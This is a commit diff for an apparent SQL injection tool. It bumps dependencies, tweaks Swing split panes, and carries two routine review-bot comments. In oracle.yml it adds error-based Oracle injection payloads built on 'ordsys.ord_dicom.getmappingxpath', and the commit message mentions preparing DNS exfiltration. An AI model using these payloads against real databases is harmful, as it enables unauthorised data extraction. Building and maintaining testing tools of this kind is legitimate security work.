
Commit 67afe48

committed
Optimize GUI, prepare for DNS exfiltration
- Add oracle Error strategy `getmappingxpath()` - Use zero size split panes - Fixes #96199 - Bump dependencies
1 parent 12e55f5 commit 67afe48


12 files changed

+151
-26
lines changed

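--- a/model/pom.xml
+++ b/model/pom.xml
@@ -53,23 +53,23 @@
 <awaitility.version>4.3.0</awaitility.version>
 <bootstrap.version>5.3.5</bootstrap.version>
 <!-- required since commons-text:1.11.0 not working -->
-<commons-lang3.version>3.17.0</commons-lang3.version>
+<commons-lang3.version>3.18.0</commons-lang3.version>
 <cubrid-jdbc.version>11.3.1.0050</cubrid-jdbc.version>
 <dnsjava.version>3.6.3</dnsjava.version>
-<gmavenplus-plugin.version>4.2.0</gmavenplus-plugin.version>
+<gmavenplus-plugin.version>4.2.1</gmavenplus-plugin.version>
 <graphql-java-tools.version>5.2.4</graphql-java-tools.version>
 <graphql-spring-boot-starter.version>5.0.2</graphql-spring-boot-starter.version>
 <groovy-test-junit5.version>4.0.13</groovy-test-junit5.version>
 <h2.version>2.3.232</h2.version>
 <hsqldb.version>2.7.4</hsqldb.version>
 <informix.jdbc.version>15.0.0.1.1</informix.jdbc.version>
 <jaxb-api.version>2.1</jaxb-api.version>
-<jaybird.version>6.0.1</jaybird.version>
+<jaybird.version>6.0.3</jaybird.version>
 <jcabi-log.version>0.24.3</jcabi-log.version>
 <jna.version>5.17.0</jna.version>
 <jquery.version>3.7.1</jquery.version>
 <json.version>20250107</json.version>
-<jsoup.version>1.19.1</jsoup.version>
+<jsoup.version>1.20.1</jsoup.version>
 <junit-pioneer.version>2.3.0</junit-pioneer.version>
 <juniversalchardet.version>1.0.3</juniversalchardet.version>
 <maven-failsafe-plugin.version>3.5.3</maven-failsafe-plugin.version>
@@ -81,7 +81,7 @@
 <mysql-connector-j.version>9.2.0</mysql-connector-j.version>
 <nashorn-core.version>15.6</nashorn-core.version>
 <!-- failure with 5.28.2 -->
-<neo4j-java-driver.version>5.27.0</neo4j-java-driver.version>
+<neo4j-java-driver.version>6.0.1</neo4j-java-driver.version>
 <neo4j-jdbc-driver.version>4.0.10</neo4j-jdbc-driver.version>
 <ojdbc8.version>23.8.0.25.04</ojdbc8.version>
 <pitest-junit5-plugin.version>1.2.2</pitest-junit5-plugin.version>
@@ -95,7 +95,7 @@
 <sqlite-dialect.version>0.1.4</sqlite-dialect.version>
 <stomp-websocket.version>2.3.4</stomp-websocket.version>
 <sybase-jconn4.version>16.0</sybase-jconn4.version>
-<vertica-jdbc.version>24.4.0-0</vertica-jdbc.version>
+<vertica-jdbc.version>25.3.0-0</vertica-jdbc.version>
 </properties>
 
 <dependencyManagement>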

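--- a/model/src/main/java/com/jsql/util/TamperingUtil.java
+++ b/model/src/main/java/com/jsql/util/TamperingUtil.java
@@ -97,8 +97,8 @@ public String tamper(String sqlQueryDefault) {
 
 sqlQuery = lead + sqlQuery + trail;
 
-String regexToremoveTamperTags = String.format("(?i)%s|%s", TamperingUtil.TAG_OPENED, TamperingUtil.TAG_CLOSED);
-sqlQuery = sqlQuery.replaceAll(regexToremoveTamperTags, StringUtils.EMPTY);
+String regexToRemoveTamperTags = String.format("(?i)%s|%s", TamperingUtil.TAG_OPENED, TamperingUtil.TAG_CLOSED);
+sqlQuery = sqlQuery.replaceAll(regexToRemoveTamperTags, StringUtils.EMPTY);
 
 // Empty when checking character insertion
 if (StringUtils.isEmpty(sqlQuery)) {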

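--- a/model/src/main/resources/vendor/oracle.yml
+++ b/model/src/main/resources/vendor/oracle.yml
@@ -281,6 +281,28 @@ strategy:
 )) from dual
 capacity: 481
 
+- name: Dicom:or
+query: |
+/* ORA-53044: invalid tag: <sqli> */
+or 1=ordsys.ord_dicom.getmappingxpath((
+${window}
+))
+capacity: 481
+
+- name: Dicom:and
+query: |
+and 1=ordsys.ord_dicom.getmappingxpath((
+${window}
+))
+capacity: 481
+
+- name: Dicom:stack
+query: |
+; select ordsys.ord_dicom.getmappingxpath((
+${window}
+)) from dual
+capacity: 481
+
 - name: Sqlhash:or
 query: |
 /* ORA-13797: invalid SQL Id specified, <sqli> */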

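--- a/pom.xml
+++ b/pom.xml
@@ -22,11 +22,9 @@
 <sonar.java.binaries>target/classes</sonar.java.binaries>
 <sonar.java.source>11</sonar.java.source>
 
-<commons-text.version>1.13.1</commons-text.version>
+<commons-text.version>1.14.0</commons-text.version>
 <flatten-maven-plugin.version>1.7.0</flatten-maven-plugin.version>
 <jacoco-maven-plugin.version>0.8.13</jacoco-maven-plugin.version>
-<!-- False positive: GData Java.Exploit.CVE-2021-44228.N Acronis (Static ML) -->
-<!-- Fixed since Apache Log4j Core - 2.15.0 -->
 <log4j-bom.version>2.24.3</log4j-bom.version>
 <maven-antrun-plugin.version>3.1.0</maven-antrun-plugin.version>
 <maven-assembly-plugin.version>3.7.1</maven-assembly-plugin.version>
@@ -44,7 +42,7 @@
 <maven-release-plugin.version>3.1.1</maven-release-plugin.version>
 <maven-site-plugin.version>4.0.0-M16</maven-site-plugin.version>
 <maven-surefire-plugin.version>3.5.3</maven-surefire-plugin.version>
-<pitest-maven.version>1.19.1</pitest-maven.version>
+<pitest-maven.version>1.20.4</pitest-maven.version>
 <spotbugs-maven-plugin.version>4.9.3.0</spotbugs-maven-plugin.version>
 <versions-maven-plugin.version>2.18.0</versions-maven-plugin.version>
 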

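--- a/view/pom.xml
+++ b/view/pom.xml
@@ -12,7 +12,7 @@
 <properties>
 <assertj-swing-junit.version>3.17.1</assertj-swing-junit.version>
 <commons-io.version>2.19.0</commons-io.version>
-<flatlaf.version>3.6</flatlaf.version>
+<flatlaf.version>3.6.1</flatlaf.version>
 <junit-jupiter-engine.version>5.12.2</junit-jupiter-engine.version>
 <maven-shade-plugin.version>3.6.0</maven-shade-plugin.version>
 <maven-assembly-plugin.version>3.7.1</maven-assembly-plugin.version>
@@ -22,6 +22,11 @@
 </properties>
 
 <dependencies>
+<dependency>
+<groupId>dnsjava</groupId>
+<artifactId>dnsjava</artifactId>
+<version>3.6.3</version>
+</dependency>
 <dependency>
 <groupId>${project.groupId}</groupId>
 <artifactId>model</artifactId>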
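Review bot: The dnsjava dependency added in the second hunk pins `<version>3.6.3</version>` as a literal, while model/pom.xml on this same page already declares `<dnsjava.version>3.6.3</dnsjava.version>`. Two independent pins for one network-facing library tend to drift, so a later security bump of the property can leave this module resolving the old release. If that property is visible from this module (it may have to move to the parent pom, which is not shown here), `<version>${dnsjava.version}</version>` keeps a single source of truth. The `<dependencies>` block continues outside the hunk, so whether the `model` artifact already brings dnsjava in transitively cannot be confirmed from these lines.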

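--- a/view/src/main/java/com/jsql/view/swing/action/ActionCloseTabResult.java
+++ b/view/src/main/java/com/jsql/view/swing/action/ActionCloseTabResult.java
@@ -21,7 +21,7 @@ public static void perform(int closeTabNumber) {
 
 if (MediatorHelper.tabResults().getTabCount() == 0) {
 var splitPaneTopBottom = MediatorHelper.frame().getSplitNS();
-JSplitPane splitPaneLeftRight = splitPaneTopBottom.getSplitEW();
+var splitPaneLeftRight = splitPaneTopBottom.getSplitEW();
 int dividerLocation = splitPaneLeftRight.getDividerLocation();
 
 var label = new JLabel(UiUtil.APP_BIG.getIcon());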

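--- a/view/src/main/java/com/jsql/view/swing/manager/ManagerCoder.java
+++ b/view/src/main/java/com/jsql/view/swing/manager/ManagerCoder.java
@@ -18,6 +18,7 @@
 import com.jsql.view.swing.text.JTextAreaPlaceholder;
 import com.jsql.view.swing.text.listener.DocumentListenerEditing;
 import com.jsql.view.swing.util.I18nViewUtil;
+import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
 import com.jsql.view.swing.util.UiUtil;
 
 import javax.swing.*;
@@ -100,7 +101,7 @@ public void process() {
 var bottom = new JPanel(new BorderLayout());
 bottom.add(new JScrollPane(this.result), BorderLayout.CENTER);
 
-var divider = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
+var divider = new JSplitPaneWithZeroSizeDivider(JSplitPane.VERTICAL_SPLIT);
 divider.setResizeWeight(0.5);
 divider.setTopComponent(topMixed);
 divider.setBottomComponent(bottom);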

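--- a/view/src/main/java/com/jsql/view/swing/panel/PanelConsoles.java
+++ b/view/src/main/java/com/jsql/view/swing/panel/PanelConsoles.java
@@ -24,6 +24,7 @@
 import com.jsql.view.swing.text.JTextAreaPlaceholderConsole;
 import com.jsql.view.swing.text.JToolTipI18n;
 import com.jsql.view.swing.util.I18nViewUtil;
+import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
 import com.jsql.view.swing.util.MediatorHelper;
 import com.jsql.view.swing.util.UiUtil;
 import org.apache.commons.lang3.StringUtils;
@@ -99,7 +100,7 @@ public PanelConsoles() {
 }
 
 private void initSplit() {
-this.networkSplitPane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
+this.networkSplitPane = new JSplitPaneWithZeroSizeDivider(JSplitPane.HORIZONTAL_SPLIT);
 this.networkSplitPane.setDividerLocation(600);
 this.networkSplitPane.setPreferredSize(new Dimension(0,0)); // required for correct scroll placement
 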

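--- a/view/src/main/java/com/jsql/view/swing/panel/split/SplitNS.java
+++ b/view/src/main/java/com/jsql/view/swing/panel/split/SplitNS.java
@@ -10,6 +10,7 @@
 ******************************************************************************/
 package com.jsql.view.swing.panel.split;
 
+import com.jsql.view.swing.util.JSplitPaneWithZeroSizeDivider;
 import com.jsql.model.InjectionModel;
 import com.jsql.util.I18nUtil;
 import com.jsql.util.PreferencesUtil;
@@ -28,12 +29,12 @@
 /**
 * SplitPane composed of tree and tabs on top, and info tabs on bottom.
 */
-public class SplitNS extends JSplitPane {
+public class SplitNS extends JSplitPaneWithZeroSizeDivider {
 
 /**
 * SplitPane containing Manager panels on the left and result tabs on the right.
 */
-private final JSplitPane splitEW = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
+private final JSplitPane splitEW = new JSplitPaneWithZeroSizeDivider(JSplitPane.HORIZONTAL_SPLIT);
 
 private static final JPanel PANEL_HIDDEN_CONSOLES = new JPanel();
 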

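--- a/view/src/main/java/com/jsql/view/swing/terminal/EmptyFocusCopy.java
+++ b/view/src/main/java/com/jsql/view/swing/terminal/EmptyFocusCopy.java
@@ -1,6 +1,8 @@
 package com.jsql.view.swing.terminal;
 
-import com.jsql.model.exception.JSqlRuntimeException;
+import com.jsql.util.LogLevelUtil;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
 
 import java.awt.*;
 import java.awt.datatransfer.DataFlavor;
@@ -15,6 +17,8 @@
 */
 public class EmptyFocusCopy implements MouseListener {
 
+private static final Logger LOGGER = LogManager.getRootLogger();
+
 private final AbstractExploit abstractExploit;
 
 public EmptyFocusCopy(AbstractExploit abstractExploit) {
@@ -35,8 +39,8 @@ private void pasteClipboard() {
 try {
 String data = (String) Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor);
 this.abstractExploit.append(data);
-} catch (UnsupportedFlavorException | IOException ex) {
-throw new JSqlRuntimeException(ex);
+} catch (UnsupportedFlavorException | IOException e) {
+LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
 }
 }
 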
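Review bot: The catch in `pasteClipboard()` (last hunk) now logs and continues, but it still covers only `UnsupportedFlavorException | IOException`. `Clipboard.getData` is also documented to throw `IllegalStateException` when the system clipboard is unavailable, and that would still propagate out of the mouse listener. If the intent of this change is that a failed paste never escapes, widen the clause to `} catch (UnsupportedFlavorException | IOException | IllegalStateException e) {`. A one-line comment above the catch, such as `// paste is best-effort: log and leave the terminal unchanged`, would record that the failure is ignored on purpose. The method's signature and any code before `try` lie outside the hunk.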
